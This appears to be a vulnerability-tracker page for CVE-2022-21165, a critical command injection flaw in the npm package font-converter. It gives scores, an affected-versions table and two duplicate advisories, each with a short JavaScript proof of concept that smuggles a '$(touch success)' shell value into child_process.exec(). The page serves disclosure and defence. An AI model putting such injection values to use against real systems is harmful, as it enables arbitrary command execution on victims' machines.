CVE-2022-21165
published 2022-08-29CVE-2022-21165: All versions of package font-converter are vulnerable to Arbitrary Command Injection due to missing sanitization of input that potentially flows into the…
PriorityP260critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EPSS
2.99%
85.6th percentile
All versions of package font-converter are vulnerable to Arbitrary Command Injection due to missing sanitization of input that potentially flows into the child_process.exec() function.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| font_converter_project | font_converter | — | — |
| font_converter_project | font_converter | — | — |
| font_converter_project | font_converter | — | — |
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
Font-Converter Vulnerable to Arbitrary Command Injection
osv·2022-08-29
CVE-2022-21165 [CRITICAL] Font-Converter Vulnerable to Arbitrary Command Injection
Font-Converter Vulnerable to Arbitrary Command Injection
### Overview
font-converter is a FontForge wrapper that allows conversion between different font formats (TTF, WOFF, OTF)
All versions of this package are vulnerable to Arbitrary Command Injection due to missing sanitization of input that potentially flows into the `child_process.exec()` function.
### PoC
```js
var PUT = require('font-converter');
var x = "$(touch success);# ";
try {
new PUT(x, x, x, x);
} catch (e) {
console.log(e);
}
```
GHSA
Font-Converter Vulnerable to Arbitrary Command Injection
ghsa·2022-08-29
CVE-2022-21165 [CRITICAL] CWE-77 Font-Converter Vulnerable to Arbitrary Command Injection
Font-Converter Vulnerable to Arbitrary Command Injection
### Overview
font-converter is a FontForge wrapper that allows conversion between different font formats (TTF, WOFF, OTF)
All versions of this package are vulnerable to Arbitrary Command Injection due to missing sanitization of input that potentially flows into the `child_process.exec()` function.
### PoC
```js
var PUT = require('font-converter');
var x = "$(touch success);# ";
try {
new PUT(x, x, x, x);
} catch (e) {
console.log(e);
}
```
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.
2022-08-29
Published